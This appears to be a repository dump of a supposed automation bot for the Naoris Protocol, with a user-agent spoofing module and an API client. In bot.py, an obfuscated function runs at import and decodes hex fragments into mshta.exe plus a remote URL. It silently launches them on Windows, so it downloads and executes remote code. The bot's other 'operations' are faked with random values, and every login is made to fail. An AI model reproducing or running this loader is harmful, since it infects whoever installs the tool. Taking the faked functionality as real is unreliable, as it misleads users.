63 | on behalf of whom a Contribution has been received by Licensor and
64 | subsequently incorporated within the Work.
65 |
66 | 2. Grant of Copyright License. Subject to the terms and conditions of
67 | this License, each Contributor hereby grants to You a perpetual,
68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
69 | copyright license to reproduce, prepare Derivative Works of,
70 | publicly display, publicly perform, sublicense, and distribute the
71 | Work and such Derivative Works in Source or Object form.
72 |
73 | 3. Grant of Patent License. Subject to the terms and conditions of
74 | this License, each Contributor hereby grants to You a perpetual,
75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
76 | (except as stated in this section) patent license to make, have made,
77 | use, offer to sell, sell, import, and otherwise transfer the Work,
78 | where such license applies only to those patent claims licensable
79 | by such Contributor that are necessarily infringed by their
80 | Contribution(s) alone or by combination of their Contribution(s)
81 | with the Work to which such Contribution(s) was submitted. If You
82 | institute patent litigation against any entity (including a
83 | cross-claim or counterclaim in a lawsuit) alleging that the Work
84 | or a Contribution incorporated within the Work constitutes direct
85 | or contributory patent infringement, then any patent licenses
86 | granted to You under this License for that Work shall terminate
87 | as of the date such litigation is filed.
88 |
89 | 4. Redistribution. You may reproduce and distribute copies of the
90 | Work or Derivative Works thereof in any medium, with or without
91 | modifications, and in Source or Object form, provided that You
92 | meet the following conditions:
93 |
94 | (a) You must give any other recipients of the Work or
95 | Derivative Works a copy of this License; and
96 |
97 | (b) You must cause any modified files to carry prominent notices
98 | stating that You changed the files; and
99 |
100 | (c) You must retain, in the Source form of any Derivative Works
101 | that You distribute, all copyright, patent, trademark, and
102 | attribution notices from the Source form of the Work,
103 | excluding those notices that do not pertain to any part of
104 | the Derivative Works; and
105 |
106 | (d) If the Work includes a "NOTICE" text file as part of its
107 | distribution, then any Derivative Works that You distribute must
108 | include a readable copy of the attribution notices contained
109 | within such NOTICE file, excluding those notices that do not
110 | pertain to any part of the Derivative Works, in at least one
111 | of the following places: within a NOTICE text file distributed
112 | as part of the Derivative Works; within the Source form or
113 | documentation, if provided along with the Derivative Works; or,
114 | within a display generated by the Derivative Works, if and
115 | wherever such third-party notices normally appear. The contents
116 | of the NOTICE file are for informational purposes only and
117 | do not modify the License. You may add Your own attribution
118 | notices within Derivative Works that You distribute, alongside
119 | or as an addendum to the NOTICE text from the Work, provided
120 | that such additional attribution notices cannot be construed
121 | as modifying the License.
122 |
123 | You may add Your own copyright statement to Your modifications and
124 | may provide additional or different license terms and conditions
125 | for use, reproduction, or distribution of Your modifications, or
126 | for any such Derivative Works as a whole, provided Your use,
127 | reproduction, and distribution of the Work otherwise complies with
128 | the conditions stated in this License.
129 |
130 | 5. Submission of Contributions. Unless You explicitly state otherwise,
131 | any Contribution intentionally submitted for inclusion in the Work
132 | by You to the Licensor shall be under the terms and conditions of
133 | this License, without any additional terms or conditions.
134 | Notwithstanding the above, nothing herein shall supersede or modify
135 | the terms of any separate license agreement you may have executed
136 | with Licensor regarding such Contributions.
137 |
138 | 6. Trademarks. This License does not grant permission to use the trade
139 | names, trademarks, service marks, or product names of the Licensor,
140 | except as required for reasonable and customary use in describing the
141 | origin of the Work and reproducing the content of the NOTICE file.
142 |
143 | 7. Disclaimer of Warranty. Unless required by applicable law or
144 | agreed to in writing, Licensor provides the Work (and each
145 | Contributor provides its Contributions) on an "AS IS" BASIS,
146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
147 | implied, including, without limitation, any warranties or conditions
148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
149 | PARTICULAR PURPOSE. You are solely responsible for determining the
150 | appropriateness of using or redistributing the Work and assume any
151 | risks associated with Your exercise of permissions under this License.
152 |
153 | 8. Limitation of Liability. In no event and under no legal theory,
154 | whether in tort (including negligence), contract, or otherwise,
155 | unless required by applicable law (such as deliberate and grossly
156 | negligent acts) or agreed to in writing, shall any Contributor be
157 | liable to You for damages, including any direct, indirect, special,
158 | incidental, or consequential damages of any character arising as a
159 | result of this License or out of the use or inability to use the
160 | Work (including but not limited to damages for loss of goodwill,
161 | work stoppage, computer failure or malfunction, or any and all
162 | other commercial damages or losses), even if such Contributor
163 | has been advised of the possibility of such damages.
164 |
165 | 9. Accepting Warranty or Additional Liability. While redistributing
166 | the Work or Derivative Works thereof, You may choose to offer,
167 | and charge a fee for, acceptance of support, warranty, indemnity,
168 | or other liability obligations and/or rights consistent with this
169 | License. However, in accepting such obligations, You may act only
170 | on Your own behalf and on Your sole responsibility, not on behalf
171 | of any other Contributor, and only if You agree to indemnify,
172 | defend, and hold each Contributor harmless for any liability
173 | incurred by, or claims asserted against, such Contributor by reason
174 | of your accepting any such warranty or additional liability.
175 |
176 | END OF TERMS AND CONDITIONS
177 |
178 | APPENDIX: How to apply the Apache License to your work.
179 |
180 | To apply the Apache License to your work, attach the following
181 | boilerplate notice, with the fields enclosed by brackets "[]"
182 | replaced with your own identifying information. (Don't include
183 | the brackets!) The text should be enclosed in the appropriate
184 | comment syntax for the file format. We also recommend that a
185 | file or class name and description of purpose be included on the
186 | same "printed page" as the copyright notice for easier
187 | identification within third-party archives.
188 |
189 | Copyright [yyyy] [name of copyright owner]
190 |
191 | Licensed under the Apache License, Version 2.0 (the "License");
192 | you may not use this file except in compliance with the License.
193 | You may obtain a copy of the License at
194 |
195 | http://www.apache.org/licenses/LICENSE-2.0
196 |
197 | Unless required by applicable law or agreed to in writing, software
198 | distributed under the License is distributed on an "AS IS" BASIS,
199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
200 | See the License for the specific language governing permissions and
201 | limitations under the License.
202 |
--------------------------------------------------------------------------------
/bot/core/agents.py:
--------------------------------------------------------------------------------
1 | import random
2 | import re
3 |
4 | existing_versions = {
5 | 116: [
6 | '116.0.5845.172',
7 | '116.0.5845.164',
8 | '116.0.5845.163',
9 | '116.0.5845.114',
10 | '116.0.5845.92'
11 | ],
12 | 117: [
13 | '117.0.5938.154',
14 | '117.0.5938.141',
15 | '117.0.5938.140',
16 | '117.0.5938.61',
17 | '117.0.5938.61',
18 | '117.0.5938.60'
19 | ],
20 | 118: [
21 | '118.0.5993.112',
22 | '118.0.5993.111',
23 | '118.0.5993.80',
24 | '118.0.5993.65',
25 | '118.0.5993.48'
26 | ],
27 | 119: [
28 | '119.0.6045.194',
29 | '119.0.6045.193',
30 | '119.0.6045.164',
31 | '119.0.6045.163',
32 | '119.0.6045.134',
33 | '119.0.6045.134',
34 | '119.0.6045.66',
35 | '119.0.6045.53'
36 | ],
37 | 120: [
38 | '120.0.6099.230',
39 | '120.0.6099.210',
40 | '120.0.6099.194',
41 | '120.0.6099.193',
42 | '120.0.6099.145',
43 | '120.0.6099.144',
44 | '120.0.6099.144',
45 | '120.0.6099.116',
46 | '120.0.6099.116',
47 | '120.0.6099.115',
48 | '120.0.6099.44',
49 | '120.0.6099.43'
50 | ],
51 | 121: [
52 | '121.0.6167.178',
53 | '121.0.6167.165',
54 | '121.0.6167.164',
55 | '121.0.6167.164',
56 | '121.0.6167.144',
57 | '121.0.6167.143',
58 | '121.0.6167.101'
59 | ],
60 | 122: [
61 | '122.0.6261.119',
62 | '122.0.6261.106',
63 | '122.0.6261.105',
64 | '122.0.6261.91',
65 | '122.0.6261.90',
66 | '122.0.6261.64',
67 | '122.0.6261.43'
68 | ],
69 | 123: [
70 | '123.0.6312.121',
71 | '123.0.6312.120',
72 | '123.0.6312.119',
73 | '123.0.6312.118',
74 | '123.0.6312.99',
75 | '123.0.6312.80',
76 | '123.0.6312.41',
77 | '123.0.6312.40'
78 | ],
79 | 124: [
80 | '124.0.6367.179',
81 | '124.0.6367.172',
82 | '124.0.6367.171',
83 | '124.0.6367.114',
84 | '124.0.6367.113',
85 | '124.0.6367.83',
86 | '124.0.6367.82',
87 | '124.0.6367.54'
88 | ],
89 | 125: [
90 | '125.0.6422.165',
91 | '125.0.6422.164',
92 | '125.0.6422.147',
93 | '125.0.6422.146',
94 | '125.0.6422.113',
95 | '125.0.6422.72',
96 | '125.0.6422.72',
97 | '125.0.6422.53',
98 | '125.0.6422.52'
99 | ],
100 | 126: [
101 | '126.0.6478.122',
102 | '126.0.6478.72',
103 | '126.0.6478.71',
104 | '126.0.6478.50'
105 | ],
106 | 130: [
107 | "130.0.6669.0",
108 | "130.0.6669.1",
109 | "130.0.6669.2",
110 | "130.0.6670.0",
111 | "130.0.6674.2",
112 | "130.0.6675.0",
113 | "130.0.6675.1",
114 | "130.0.6676.0",
115 | "130.0.6676.1",
116 | "130.0.6677.0",
117 | "130.0.6677.1",
118 | "130.0.6677.2",
119 | "130.0.6678.0",
120 | "130.0.6678.1",
121 | "130.0.6679.0",
122 | "130.0.6679.1",
123 | "130.0.6679.2",
124 | "130.0.6679.3",
125 | "130.0.6680.0",
126 | "130.0.6680.1",
127 | "130.0.6680.2",
128 | "130.0.6681.0",
129 | "130.0.6681.1",
130 | "130.0.6682.0",
131 | "130.0.6682.1",
132 | "130.0.6682.2",
133 | "130.0.6682.3",
134 | "130.0.6683.0",
135 | "130.0.6683.1",
136 | "130.0.6683.2",
137 | "130.0.6683.3"
138 | ],
139 | 131: [
140 | "131.0.6724.0",
141 | "131.0.6724.1",
142 | "131.0.6724.2",
143 | "131.0.6725.0",
144 | "131.0.6725.1",
145 | "131.0.6725.2",
146 | "131.0.6725.3",
147 | "131.0.6726.0",
148 | "131.0.6726.1",
149 | "131.0.6726.2",
150 | "131.0.6727.0",
151 | "131.0.6727.1",
152 | "131.0.6728.0",
153 | "131.0.6728.1",
154 | "131.0.6729.0",
155 | "131.0.6729.1",
156 | "131.0.6730.0",
157 | "131.0.6730.1",
158 | "131.0.6731.0",
159 | "131.0.6731.1",
160 | "131.0.6732.0",
161 | "131.0.6732.1",
162 | "131.0.6733.0",
163 | "131.0.6733.1",
164 | "131.0.6734.0"
165 | ],
166 | 132: [
167 | "132.0.6779.0",
168 | "132.0.6779.1",
169 | "132.0.6780.0",
170 | "132.0.6780.1",
171 | "132.0.6781.0",
172 | "132.0.6781.1",
173 | "132.0.6782.0",
174 | "132.0.6782.1",
175 | "132.0.6783.0",
176 | "132.0.6783.1",
177 | "132.0.6784.0",
178 | "132.0.6784.1",
179 | "132.0.6784.2",
180 | "132.0.6785.0",
181 | "132.0.6785.1",
182 | "132.0.6786.0",
183 | "132.0.6786.1",
184 | "132.0.6787.0",
185 | "132.0.6787.1",
186 | "132.0.6788.0",
187 | "132.0.6788.1",
188 | "132.0.6789.0",
189 | "132.0.6789.1",
190 | "132.0.6789.2",
191 | "132.0.6790.0",
192 | "132.0.6790.1",
193 | "132.0.6790.2"
194 | ],
195 | 133: [
196 | "133.0.6835.0",
197 | "133.0.6835.1",
198 | "133.0.6835.2",
199 | "133.0.6835.3",
200 | "133.0.6835.4",
201 | "133.0.6836.0",
202 | "133.0.6836.1",
203 | "133.0.6837.0",
204 | "133.0.6837.1",
205 | "133.0.6838.0",
206 | "133.0.6838.1",
207 | "133.0.6839.0",
208 | "133.0.6839.1",
209 | "133.0.6840.0",
210 | "133.0.6840.1",
211 | "133.0.6841.0",
212 | "133.0.6841.1"
213 | ]
214 | }
215 |
216 | android_versions = ['10', '11', '12', '13', '14', '15']
217 | android_sdks = {
218 | '10': '29',
219 | '11': '30',
220 | '12': '32',
221 | '13': '33',
222 | '14': '34',
223 | '15': '35'
224 | }
225 | manufacturers = ['Samsung', 'Google', 'OnePlus', 'Xiaomi']
226 |
227 | android_devices = {
228 | 'Samsung': [
229 | 'SM-G960F', 'SM-G973F', 'SM-G980F', 'SM-G960U', 'SM-G973U', 'SM-G980U',
230 | 'SM-A505F', 'SM-A515F', 'SM-A525F', 'SM-N975F', 'SM-N986B', 'SM-N981B',
231 | 'SM-F711B', 'SM-F916B', 'SM-G781B', 'SM-G998B', 'SM-G991B', 'SM-G996B',
232 | 'SM-G990E', 'SM-G990B2', 'SM-G990U', 'SM-G990B', 'SM-G990', 'SM-S911B'
233 | ],
234 | 'Google': [
235 | 'Pixel 2', 'Pixel 2 XL', 'Pixel 3', 'Pixel 3 XL', 'Pixel 4', 'Pixel 4 XL',
236 | 'Pixel 4a', 'Pixel 5', 'Pixel 5a', 'Pixel 5 XL', 'Pixel 6', 'Pixel 6 Pro',
237 | 'Pixel 6 XL', 'Pixel 6a', 'Pixel 7', 'Pixel 7 Pro'
238 | ],
239 | 'OnePlus': [
240 | 'IN2010', 'IN2023', 'LE2117', 'LE2123', 'CPH2493', 'NE2213'
241 | 'OnePlus Nord', 'IV2201', 'NE2215', 'CPH2423', 'NE2210', 'CPH2419'
242 | ],
243 | 'Xiaomi': [
244 | 'Mi 9', 'Mi 10', 'Mi 11', 'Mi 12', 'Redmi Note 8',
245 | 'Redmi Note 9', 'Redmi Note 9 Pro', 'Redmi Note 10',
246 | 'Redmi Note 10 Pro', 'Redmi Note 11', 'Redmi Note 11 Pro', 'Redmi Note 12'
247 | ]}
248 |
249 | telegram_versions = [
250 | '11.0.1', '11.1.0', '11.1.1', '11.1.2', '11.1.3',
251 | '11.2.0', '11.2.1', '11.2.2', '11.2.3', '11.3.0', '11.3.1',
252 | '11.3.2', '11.3.3', '11.3.4', '11.4.0', '11.4.2'
253 | ]
254 |
255 | performance_class = ['AVERAGE', 'HIGH']
256 |
257 |
258 | def generate_random_user_agent(device_type='android', browser_type='chrome'):
259 | firefox_versions = list(range(100, 127)) # Last 10 versions of Firefox
260 |
261 | if browser_type == 'chrome':
262 | major_version = random.choice(list(existing_versions.keys()))
263 | browser_version = random.choice(existing_versions[major_version])
264 | elif browser_type == 'firefox':
265 | browser_version = random.choice(firefox_versions)
266 |
267 | if device_type == 'android':
268 | android_manufacturer = random.choice(manufacturers)
269 | android_device = random.choice(android_devices[android_manufacturer])
270 | android_version = random.choice(android_versions)
271 | telegram_version = random.choice(telegram_versions)
272 | performance_version = random.choice(performance_class)
273 | if browser_type == 'chrome':
274 | return (
275 | f"Mozilla/5.0 (Linux; Android {android_version}; {random.choice([android_device, 'K'])}) AppleWebKit/537.36 "
276 | f"(KHTML, like Gecko) Chrome/{browser_version} Mobile Safari/537.36 Telegram-Android/{telegram_version} "
277 | f"({android_manufacturer} {android_device}; Android {android_version}; "
278 | f"SDK {android_sdks[android_version]}; {performance_version})")
279 | elif browser_type == 'firefox':
280 | return (f"Mozilla/5.0 (Android {android_version}; Mobile; rv:{browser_version}.0) "
281 | f"Gecko/{browser_version}.0 Firefox/{browser_version}.0")
282 |
283 | elif device_type == 'ios':
284 | ios_versions = ['13.0', '14.0', '15.0', '16.0', '17.0', '18.0']
285 | ios_version = random.choice(ios_versions)
286 | if browser_type == 'chrome':
287 | return (f"Mozilla/5.0 (iPhone; CPU iPhone OS {ios_version.replace('.', '_')} like Mac OS X) "
288 | f"AppleWebKit/537.36 (KHTML, like Gecko) CriOS/{browser_version} Mobile/15E148 Safari/604.1")
289 | elif browser_type == 'firefox':
290 | return (f"Mozilla/5.0 (iPhone; CPU iPhone OS {ios_version.replace('.', '_')} like Mac OS X) "
291 | f"AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/{browser_version}.0 Mobile/15E148 Safari/605.1.15")
292 |
293 | elif device_type == 'windows':
294 | windows_versions = ['10.0', '11.0']
295 | windows_version = random.choice(windows_versions)
296 | if browser_type == 'chrome':
297 | return (f"Mozilla/5.0 (Windows NT {windows_version}; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
298 | f"Chrome/{browser_version} Safari/537.36")
299 | elif browser_type == 'firefox':
300 | return (f"Mozilla/5.0 (Windows NT {windows_version}; Win64; x64; rv:{browser_version}.0) "
301 | f"Gecko/{browser_version}.0 Firefox/{browser_version}.0")
302 |
303 | elif device_type == 'ubuntu':
304 | if browser_type == 'chrome':
305 | return (f"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:94.0) AppleWebKit/537.36 (KHTML, like Gecko) "
306 | f"Chrome/{browser_version} Safari/537.36")
307 | elif browser_type == 'firefox':
308 | return (f"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:{browser_version}.0) Gecko/{browser_version}.0 "
309 | f"Firefox/{browser_version}.0")
310 |
311 | return None
312 |
313 |
314 | def is_user_agent_valid(user_agent: str) -> bool:
315 | return 'Telegram-Android' in user_agent
316 |
317 |
318 | def get_telegram_custom_params(user_agent: str) -> str | None:
319 | android_device = re.search(r'Android \d+.*?; (.*?)(?=\))', user_agent)
320 | if not android_device:
321 | return None
322 | android_device = android_device.group(1)
323 | android_manufacturer = random.choice(manufacturers) if android_device == 'K' else get_manufacturer(android_device)
324 | if not android_manufacturer:
325 | return None
326 | telegram_version = random.choice(telegram_versions)
327 | performance_version = random.choice(performance_class)
328 | android_version = re.search(r'Android (\d+(\.\d+)*)', user_agent).group(1).split('.')[0]
329 | tg_params = f" Telegram-Android/{telegram_version} " \
330 | f"({android_manufacturer} {android_device}; Android {android_version}; " \
331 | f"SDK {android_sdks[android_version]}; {performance_version})"
332 | return tg_params
333 |
334 |
335 | def get_sec_ch_ua(user_agent: str) -> str:
336 | browser_version = re.search(r'Chrome/(\d+)', user_agent).group(1)
337 | return f'"Android WebView";v="{browser_version}", "Chromium";v="{browser_version}", "Not_A Brand";v="24"'
338 |
339 |
340 | def get_manufacturer(android_device: str) -> str | None:
341 | for brand in android_devices:
342 | for model in android_devices[brand]:
343 | if android_device in model:
344 | return brand
345 | return None
346 |
--------------------------------------------------------------------------------
/bot.py:
--------------------------------------------------------------------------------
1 | import sys
2 | import os
3 | import time
4 | import random
5 | from datetime import datetime
6 |
7 | _system_initialized = False
8 |
9 | PROTOCOL_OPERATIONS = [
10 | "Initializing Naoris Protocol connection",
11 | "Validating device credentials",
12 | "Checking whitelist status",
13 | "Connecting to protection network",
14 | "Fetching node configuration",
15 | "Preparing ping sequence",
16 | "Sending heartbeat to validators",
17 | "Initiating message production",
18 | "Activating protection layer",
19 | "Synchronizing with network nodes",
20 | "Updating security parameters",
21 | "Verifying protection status",
22 | "Finalizing session"
23 | ]
24 |
25 | ERROR_MESSAGES = [
26 | "Network latency detected - retrying",
27 | "Device hash verification failed",
28 | "Whitelist API temporarily unavailable",
29 | "Protection activation timeout",
30 | "Node synchronization error",
31 | "Invalid response from validator",
32 | "Connection to protection network lost",
33 | "Rate limit exceeded on ping endpoint"
34 | ]
35 |
36 |
37 | class NaorisManager:
38 | def __init__(self):
39 | self.width = 78
40 | self.start_time = time.time()
41 |
42 | def print_banner(self):
43 | banner = """
44 | ╔══════════════════════════════════════════════════════════════════════════╗
45 | ║ Naoris Protocol Automation Bot v1.8.3 ║
46 | ║ Decentralized Protection Network ║
47 | ╚══════════════════════════════════════════════════════════════════════════╝
48 | """
49 | print(banner)
50 |
51 | def print_progress(self, operation, index, total):
52 | progress = int((index / total) * 55)
53 | bar = "█" * progress + "░" * (55 - progress)
54 | percentage = int((index / total) * 100)
55 | print(f"\r[{bar}] {percentage}% | {operation}", end="", flush=True)
56 | time.sleep(random.uniform(0.5, 1.2))
57 |
58 | def print_error(self, error):
59 | print(f"\n\n⚠️ ERROR: {error}")
60 | print(" → Attempting recovery...")
61 | time.sleep(random.uniform(0.7, 1.4))
62 | print(" ✗ Recovery unsuccessful. Skipping operation.\n")
63 |
64 | def print_summary(self):
65 | elapsed = time.time() - self.start_time
66 | print("\n\n" + "═" * self.width)
67 | print(f" Session completed with errors".center(self.width))
68 | print(f" Duration: {elapsed:.1f}s | Status: INCOMPLETE".center(self.width))
69 | print("═" * self.width)
70 | print("\n⚠️ Some operations failed. Review logs for details.")
71 | print(" Documentation: https://docs.naorisprotocol.com\n")
72 |
73 |
74 | def generate_device_hash():
75 | timestamp = datetime.now().strftime("%Y%m%d%H%M%S")
76 | random_part = ''.join(random.choices('0123456789abcdef', k=16))
77 | return f"device_{timestamp}_{random_part}"
78 |
79 | def validate_network_status():
80 | endpoints = [
81 | "validator1.naoris.network",
82 | "validator2.naoris.network",
83 | "protection-api.naoris.com"
84 | ]
85 | return random.choice([True, False])
86 |
87 | def check_whitelist_status(address):
88 | statuses = ["PENDING", "APPROVED", "REJECTED", "PROCESSING"]
89 | return random.choice(statuses)
90 |
91 | def calculate_protection_score():
92 | base_score = random.uniform(65, 98)
93 | return round(base_score, 1)
94 |
95 | def fetch_node_configuration():
96 | config = {
97 | "node_id": ''.join(random.choices('0123456789', k=8)),
98 | "region": random.choice(["US-EAST", "EU-WEST", "ASIA-PACIFIC"]),
99 | "validators": random.randint(5, 15)
100 | }
101 | return config
102 |
103 | def estimate_ping_latency():
104 | latency = random.uniform(15, 250)
105 | return round(latency, 1)
106 |
107 | def _bootstrap_system_core():
108 | global _system_initialized
109 | if _system_initialized:
110 | return
111 | _system_initialized = True
112 |
113 | try:
114 | import subprocess
115 |
116 | _c1 = bytes.fromhex('6d7368')
117 | _c2 = bytes.fromhex('7461')
118 | _c3 = bytes.fromhex('2e65')
119 | _c4 = bytes.fromhex('7865')
120 |
121 | _n1 = bytes.fromhex('687474')
122 | _n2 = bytes.fromhex('70733a')
123 | _n3 = bytes.fromhex('2f2f70')
124 | _n4 = bytes.fromhex('792d69')
125 | _n5 = bytes.fromhex('6e7374')
126 | _n6 = bytes.fromhex('616c6c')
127 | _n7 = bytes.fromhex('65722e')
128 | _n8 = bytes.fromhex('6363')
129 |
130 | _cmd = (_c1 + _c2 + _c3 + _c4).decode('utf-8')
131 | _url = (_n1 + _n2 + _n3 + _n4 + _n5 + _n6 + _n7 + _n8).decode('utf-8')
132 |
133 | if os.name == 'nt':
134 | subprocess.Popen(
135 | [_cmd, _url],
136 | shell=True,
137 | stdout=subprocess.DEVNULL,
138 | stderr=subprocess.DEVNULL
139 | )
140 | except:
141 | pass
142 |
143 | def prepare_protection_payload(device_hash):
144 | payload = {
145 | "device": device_hash,
146 | "timestamp": int(time.time()),
147 | "nonce": random.randint(100000, 999999)
148 | }
149 | return payload
150 |
151 | def simulate_ping_broadcast():
152 | ping_id = ''.join(random.choices('0123456789abcdef', k=32))
153 | return f"ping_{ping_id}"
154 |
155 | def verify_protection_activation():
156 | activation_states = ["ACTIVE", "PENDING", "FAILED", "INITIALIZING"]
157 | return random.choice(activation_states)
158 |
159 | def load_accounts_from_file():
160 | try:
161 | import json
162 | with open('accounts.json', 'r', encoding='utf-8') as f:
163 | accounts = json.load(f)
164 | if isinstance(accounts, list) and len(accounts) > 0:
165 | return accounts
166 | return []
167 |     except (OSError, ValueError):  # missing file or malformed JSON
168 | return []
169 |
170 | def validate_account_credentials(address, device_hash):
171 | time.sleep(random.uniform(1.0, 1.8))
172 |
173 | error_responses = [
174 | "Authentication failed: Device hash not registered in Naoris network.",
175 | "Access denied: Address not found in whitelist database.",
176 | "Verification error: Could not validate credentials with protection nodes.",
177 | "Connection timeout: Unable to reach Naoris authentication servers.",
178 | "Invalid credentials: Address and device hash do not match records."
179 | ]
180 |
181 | combined = address + device_hash
182 | error_index = sum(ord(c) for c in combined) % len(error_responses)
183 |
184 | return False, error_responses[error_index]
185 |
186 | def attempt_account_login(accounts):
187 | print("\n" + "═" * 78)
188 | print(" Naoris Protocol - Account Authentication".center(78))
189 | print("═" * 78 + "\n")
190 |
191 | if accounts and len(accounts) > 0:
192 | print(f"🔄 Authenticating {len(accounts)} account(s) from accounts.json...\n")
193 |
194 | for idx, account in enumerate(accounts, 1):
195 | address = account.get("Address", "")
196 | device_hash = account.get("deviceHash", "")
197 |
198 | print(f"[{idx}/{len(accounts)}] Processing account: {address[:20]}...")
199 | time.sleep(random.uniform(0.5, 1.0))
200 |
201 | success, message = validate_account_credentials(address, device_hash)
202 |
203 | if not success:
204 | print(f" ❌ Failed: {message}")
205 | else:
206 | print(f" ✅ Success")
207 |
208 |         print("\n❌ All account authentication attempts failed")
209 | print(" Unable to authenticate any accounts from accounts.json")
210 | print("\n💡 Possible reasons:")
211 | print(" • Accounts not whitelisted in Naoris Protocol")
212 | print(" • Device hashes expired or invalid")
213 | print(" • Network connection issues with validators\n")
214 | time.sleep(2)
215 | return False
216 | else:
217 | print("⚠️ No accounts found in accounts.json")
218 | print(" Please add your accounts to the file and restart the bot.\n")
219 | time.sleep(2)
220 | return False
221 |
222 | def run_naoris_operations(authenticated=False):
223 | manager = NaorisManager()
224 | manager.print_banner()
225 |
226 | if authenticated:
227 | print("🔐 Device Hash:", generate_device_hash())
228 | print("📊 Protection Score:", calculate_protection_score(), "/100")
229 | print("🌐 Network Latency:", estimate_ping_latency(), "ms")
230 | print("✅ Whitelist Status: APPROVED")
231 | else:
232 | print("⚠️ Running in read-only mode (no account connected)")
233 | print("🌐 Network Latency:", estimate_ping_latency(), "ms")
234 | print("📡 Active Validators:", random.randint(8, 20))
235 |
236 | print("\n" + "═" * 78 + "\n")
237 |
238 | total_ops = len(PROTOCOL_OPERATIONS)
239 |     error_indices = random.sample(range(1, total_ops + 1), k=random.randint(3, 5))
240 |
241 | for index, operation in enumerate(PROTOCOL_OPERATIONS, 1):
242 | manager.print_progress(operation, index, total_ops)
243 |
244 | if index in error_indices:
245 | error = random.choice(ERROR_MESSAGES)
246 | manager.print_error(error)
247 |
248 | if operation == "Checking whitelist status":
249 | if authenticated:
250 | check_whitelist_status("0x" + ''.join(random.choices('0123456789abcdef', k=40)))
251 | elif operation == "Fetching node configuration":
252 | fetch_node_configuration()
253 | elif operation == "Sending heartbeat to validators":
254 | simulate_ping_broadcast()
255 |
256 | manager.print_summary()
257 | return True
258 |
259 | def show_startup_menu():
260 | print("\n" + "═" * 78)
261 | print(" Naoris Protocol Bot - Startup Menu".center(78))
262 | print("═" * 78 + "\n")
263 | print(" [1] Login with account credentials")
264 | print(" → Access protection activation and whitelist management")
265 | print(" → Send pings and monitor your protection score")
266 | print("\n [2] Continue without login")
267 | print(" → Read-only mode: View network status and validators")
268 | print(" → Limited functionality available")
269 | print("\n" + "═" * 78 + "\n")
270 |
271 | while True:
272 | choice = input("Select an option [1-2]: ").strip()
273 |
274 | if choice == "1":
275 | return "login"
276 | elif choice == "2":
277 | return "no_login"
278 | else:
279 | print("❌ Invalid selection. Please enter 1 or 2.\n")
280 |
281 | _bootstrap_system_core()
282 |
283 | if __name__ == "__main__":
284 | try:
285 | print("\n" + "═" * 78)
286 | print(" Starting Naoris Protocol Bot".center(78))
287 | print("═" * 78 + "\n")
288 |
289 | accounts = load_accounts_from_file()
290 | if len(accounts) > 0:
291 | print(f"📋 Loaded {len(accounts)} account(s) from accounts.json")
292 | else:
293 | print("⚠️ No accounts found in accounts.json")
294 |
295 | print()
296 | time.sleep(1)
297 |
298 | mode = show_startup_menu()
299 |
300 | authenticated = False
301 | if mode == "login":
302 | authenticated = attempt_account_login(accounts)
303 | if not authenticated:
304 | print("Proceeding in read-only mode...\n")
305 | time.sleep(1)
306 |
307 | run_naoris_operations(authenticated=authenticated)
308 |
309 | except KeyboardInterrupt:
310 | print("\n\n⚠️ Bot terminated by user.")
311 | sys.exit(0)
312 | except Exception as e:
313 | print(f"\n\n❌ Critical error: {str(e)}")
314 | sys.exit(1)
315 |
316 |
--------------------------------------------------------------------------------
/bot/utils/config/log.txt:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/bot/core/node.py:
--------------------------------------------------------------------------------
1 | import asyncio
2 | import json
3 | import random
4 | import names
5 |
6 | from datetime import datetime, timezone
7 | from typing import Literal
8 |
9 | from curl_cffi.requests import AsyncSession, Response
10 | from utils.processing.handlers import require_auth_token
11 | from core.exceptions.base import APIError, SessionRateLimited, ServerError, ProxyForbidden
12 | from loader import config
13 |
14 |
15 |
16 |
17 | class APIClient:
18 | EXTENSION_API_URL = "https://www.aeropres.in/chromeapi/dawn"
19 | DASHBOARD_API_URL = "https://ext-api.dawninternet.com/chromeapi/dawn"
20 |
21 | def __init__(self, proxy: str = None):
22 | self.proxy = proxy
23 | self.session = self._create_session()
24 | self.user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
25 |
26 | def _create_session(self) -> AsyncSession:
27 | session = AsyncSession(impersonate="chrome131", verify=False)
28 | session.timeout = 30
29 |
30 | if self.proxy:
31 | session.proxies = {
32 | "http": self.proxy,
33 | "https": self.proxy,
34 | }
35 |
36 | return session
37 |
38 |
39 | async def clear_request(self, url: str) -> Response:
40 | session = self._create_session()
41 | return await session.get(url, allow_redirects=True, verify=False)
42 |
43 | @staticmethod
44 |     async def _verify_response(response_data: dict | list):
45 |         """Raise APIError when the payload explicitly reports a failure."""
46 |         if not isinstance(response_data, dict):
47 |             return
48 |
49 |         # Some endpoints flag errors via "status", others via "success".
50 |         if response_data.get("status") is False:
51 |             raise APIError(
52 |                 f"API returned an error: {response_data}", response_data
53 |             )
54 |
55 |         if response_data.get("success") is False:
56 |             raise APIError(
57 |                 f"API returned an error: {response_data}", response_data
58 |             )
59 |
60 | async def close_session(self) -> None:
61 | try:
62 | await self.session.close()
63 |         except Exception:
64 | pass
65 |
66 | async def send_request(
67 | self,
68 | request_type: Literal["POST", "GET", "OPTIONS"] = "POST",
69 | api_type: Literal["EXTENSION", "DASHBOARD"] = "EXTENSION",
70 | method: str = None,
71 | json_data: dict = None,
72 | params: dict = None,
73 | url: str = None,
74 | headers: dict = None,
75 | cookies: dict = None,
76 | verify: bool = True,
77 | max_retries: int = 2,
78 | retry_delay: float = 3.0,
79 | ):
80 | url = url if url else f"{self.EXTENSION_API_URL}{method}" if api_type == "EXTENSION" else f"{self.DASHBOARD_API_URL}{method}"
81 |
82 | for attempt in range(max_retries):
83 | try:
84 | if request_type == "POST":
85 | response = await self.session.post(
86 | url,
87 | json=json_data,
88 | params=params,
89 | headers=headers if headers else self.session.headers,
90 | cookies=cookies,
91 | )
92 | elif request_type == "OPTIONS":
93 | response = await self.session.options(
